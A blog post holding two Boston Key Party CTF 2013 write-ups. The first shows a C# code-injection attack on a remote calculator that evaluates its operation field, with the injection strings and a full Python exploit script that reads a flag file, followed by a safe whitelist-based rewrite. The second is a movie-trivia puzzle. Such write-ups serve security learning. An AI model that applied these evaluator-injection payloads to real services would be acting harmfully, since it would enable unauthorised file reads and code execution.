Monday, June 10, 2013

Boston Key Party CTF 2013 - Wolfram Beta writeup

We have a simple remote calculator on 54.218.12.97:34567 that reads three inputs: number1, operation and number2.
Let's send some values and symbols to probe it.
If number1 or number2 is not a number, the calculator replies: Hey, numbers only. This is just a calculator.
But the operation value may consist of any symbols. My attempt to inject "+123+" into the operation value was successful.
Then I understood that the calculator uses the Mono.CSharp.Evaluator.Evaluate method. Here is the exception message:
Unhandled Exception: System.ArgumentException: The expression did not set a result
  at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0
  at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0
  at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0
[ERROR] FATAL UNHANDLED EXCEPTION:
System.ArgumentException: The expression did not set a result
  at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0
  at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0
  at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0

Let's list the files in the current directory to find a "flag" file, using the following injection in the operation value:
op = '==1; foreach (var dir in System.IO.Directory.GetFiles(System.IO.Directory.GetCurrentDirectory())) System.Console.WriteLine(dir); 31337+'
Awesome! The flag file is found :)
/home/wbeta/flag
Now we just need to read it.
Here is the full exploit code:
import socket

HOST, PORT = "54.218.12.97", 34567

s = socket.socket()
s.connect((HOST, PORT))


def recv_print():
    """Receive one chunk from the service and echo it."""
    data = s.recv(1024)
    print(data.decode(errors="replace"))
    return data


# receive calculator info (banner and prompt)
recv_print()
recv_print()

# set numbers and operation
# The numbers pass the "numbers only" check; the operation field is not
# checked, so it carries C# statements that Mono.CSharp.Evaluator executes:
# "==1" closes the first expression, the file is read and printed, and
# "31337+" starts a new expression that joins with number2.
n1 = '0'
n2 = '0'
op = '==1; System.Console.WriteLine(System.IO.File.ReadAllText("/home/wbeta/flag")); 31337+'

# send number1, operation and number2, each terminated by a newline
s.send((n1 + '\n').encode())
recv_print()
s.send((op + '\n').encode())
recv_print()
s.send((n2 + '\n').encode())
recv_print()
data = s.recv(1024)

# thinking... the service prints progress until "Done Thinking!"
while b'Done Thinking!' not in data:
    data = s.recv(1024)
    print(data.decode(errors="replace"), end='')

# receive result (the flag printed by the injected statement)
recv_print()
s.close()

Done! The flag is received: at_least_its_not_a_python_jail
It's not a python jail :)
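The root cause is that the operation field goes straight into a code evaluator while only the two numbers are validated. As an added example (not the CTF service's code), here is how a calculator handler can avoid the bug entirely: numbers are checked with a strict pattern, the operation must match an explicit whitelist mapped to real functions, and the injection strings from this writeup are rejected before anything is evaluated. Function and error names are my own.

```python
import operator
import re

# Added example, not the CTF service's code: a calculator that never hands
# user-supplied text to a code evaluator such as Mono.CSharp.Evaluator.
NUMBER_RE = re.compile(r'^-?\d+(\.\d+)?$')

# The whitelist maps the only accepted operation strings to real functions,
# so there is no string left over to interpret as code.
OPERATIONS = {
    '+': operator.add,
    '-': operator.sub,
    '*': operator.mul,
    '/': operator.truediv,
}


class CalculatorError(ValueError):
    """Raised for any request the calculator refuses to handle."""


def calculate(number1, operation, number2):
    """Return number1 <operation> number2 or raise CalculatorError.

    Payloads such as '+123+' or '==1; ...; 31337+' never match a whitelist
    key, so they are rejected with the same message as a bad number.
    """
    for value in (number1, number2):
        if not NUMBER_RE.match(value.strip()):
            raise CalculatorError('Hey, numbers only. This is just a calculator.')
    func = OPERATIONS.get(operation.strip())
    if func is None:
        raise CalculatorError('Unknown operation: only + - * / are supported.')
    a, b = float(number1), float(number2)
    if func is operator.truediv and b == 0:
        raise CalculatorError('Division by zero.')
    return func(a, b)


def is_safe_request(number1, operation, number2):
    """True if the request would be accepted; useful for logging rejected probes."""
    try:
        calculate(number1, operation, number2)
        return True
    except CalculatorError:
        return False
```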

Boston Key Party CTF 2013 - Mystery writeup

A list of links and code is given. We need to find which movie each of these parts comes from.
After some searching, I found all of them and got the list of movies. It's really good. :) Here it is:
The Social Network
Tron Legacy
Judge Dredd
The Girl with the Dragon Tattoo
Jurassic Park
Minority Report
Sneakers
Hackers
So the flag is wargames.